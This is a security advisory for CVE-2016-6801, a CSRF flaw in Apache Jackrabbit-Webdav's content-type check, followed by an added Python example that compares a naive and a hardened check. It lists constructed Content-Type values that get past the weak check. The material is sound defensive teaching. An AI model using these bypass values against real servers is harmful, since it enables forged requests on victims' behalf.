CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
Apache Jackrabbit 2.4.5
Apache Jackrabbit 2.6.5
Apache Jackrabbit 2.8.2
Apache Jackrabbit 2.10.3
Apache Jackrabbit 2.12.3
Apache Jackrabbit 2.13.2

Description:
The CSRF content-type check for POST requests does not handle missing Content-Type header fields, nor variations in field values with respect to upper/lower case or optional parameters. This can be exploited to create a resource via CSRF.

Mitigation:
2.4.x users upgrade to 2.4.5 and apply the patch in http://svn.apache.org/r1758791 and/or upgrade to 2.4.6 once released
2.6.x users upgrade to 2.6.5 and apply the patch in http://svn.apache.org/r1758771 and/or upgrade to 2.6.6 once released
2.8.x users upgrade to 2.8.2 and apply the patch in http://svn.apache.org/r1758764 and/or upgrade to 2.8.3 once released
2.10.x users should upgrade to 2.10.4
2.12.x users should upgrade to 2.12.4
2.13.x users should upgrade to 2.13.3

Example:
A resource can be created like so:
Credit: This issue was discovered by Lukas Reschke.
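The description above names three ways a content-type based CSRF check can be sidestepped: the header is absent, its case differs, or it carries an optional parameter such as charset. The following is an added illustration written for this page, not Jackrabbit's own CSRFUtil code and not the advisory's missing example. It places a naive exact-match check beside a hardened one and runs both over constructed Content-Type values that any attacker-controlled page can make a victim's browser send in a cross-site POST. All function names and the FORM_CONTENT_TYPES set are assumptions of this example.

```python
"""Added example: naive vs. hardened form-content-type check for CSRF protection.

Illustrative code for this page, not Apache Jackrabbit's implementation.
"""

# Media types an HTML <form> or a fetch()/XMLHttpRequest "simple request" can
# send cross-origin without a CORS preflight. A POST carrying one of these may
# have been triggered by any web page, so it must go through the Referer/Origin
# check. (Set and names are assumptions of this example.)
FORM_CONTENT_TYPES = frozenset({
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
})


def naive_is_form_post(content_type):
    """The weak check: exact, case-sensitive comparison of the raw header value.

    A missing header (None), an upper-case spelling, or a trailing parameter
    such as ';charset=UTF-8' is not in the set, so the request is treated as a
    non-form POST and skips the CSRF check. That is the class of bug the
    advisory describes.
    """
    return content_type in FORM_CONTENT_TYPES


def normalize_media_type(content_type):
    """Reduce a Content-Type value to its lower-case type/subtype.

    Drops everything after the first ';' (charset, boundary, ...) and
    surrounding whitespace, per the media-type grammar: the type and subtype
    are case-insensitive and parameters do not change the media type.
    """
    media_type = content_type.split(";", 1)[0]
    return media_type.strip().lower()


def hardened_is_form_post(content_type):
    """Treat the request as form-capable unless its media type is clearly not.

    - None or empty: browsers send bodyless POSTs (fetch with no body,
      sendBeacon) with no Content-Type at all, so absence must not be read as
      "not a form"; fail closed.
    - Otherwise compare the normalised media type, so case and parameters
      cannot hide a form content type.
    """
    if not content_type or not content_type.strip():
        return True
    return normalize_media_type(content_type) in FORM_CONTENT_TYPES


def requires_csrf_check(method, content_type, is_form_post=hardened_is_form_post):
    """Decide whether a request must pass the Referer/Origin CSRF check.

    Only state-changing POSTs with a browser-sendable form content type need it;
    a POST with e.g. application/json can only come cross-origin after a CORS
    preflight, which the server did not grant.
    """
    if method.upper() != "POST":
        return False
    return is_form_post(content_type)


def evasion_samples():
    """Constructed Content-Type values a CSRF page can cause a browser to send."""
    return [
        None,                                                    # fetch(url, {method: "POST"}) with no body
        "APPLICATION/X-WWW-FORM-URLENCODED",                     # case variation
        "application/x-www-form-urlencoded; charset=UTF-8",      # optional parameter
        "multipart/form-data; boundary=----WebKitFormBoundaryX", # parameter on multipart
        "text/plain;charset=UTF-8",                              # fetch() with a string body
    ]


def bypasses(check):
    """Return the sample values that `check` wrongly classifies as non-form posts."""
    return [ct for ct in evasion_samples() if not check(ct)]


if __name__ == "__main__":
    print("naive check lets through:   ", bypasses(naive_is_form_post))
    print("hardened check lets through:", bypasses(hardened_is_form_post))
```

The naive check passes all five constructed values straight through, while the hardened check flags every one of them and still lets a genuine application/json POST skip the Referer check. Note that a content-type check alone is only a first gate; a robust design also verifies the Origin or Referer header, or uses an anti-CSRF token, for every form-capable POST.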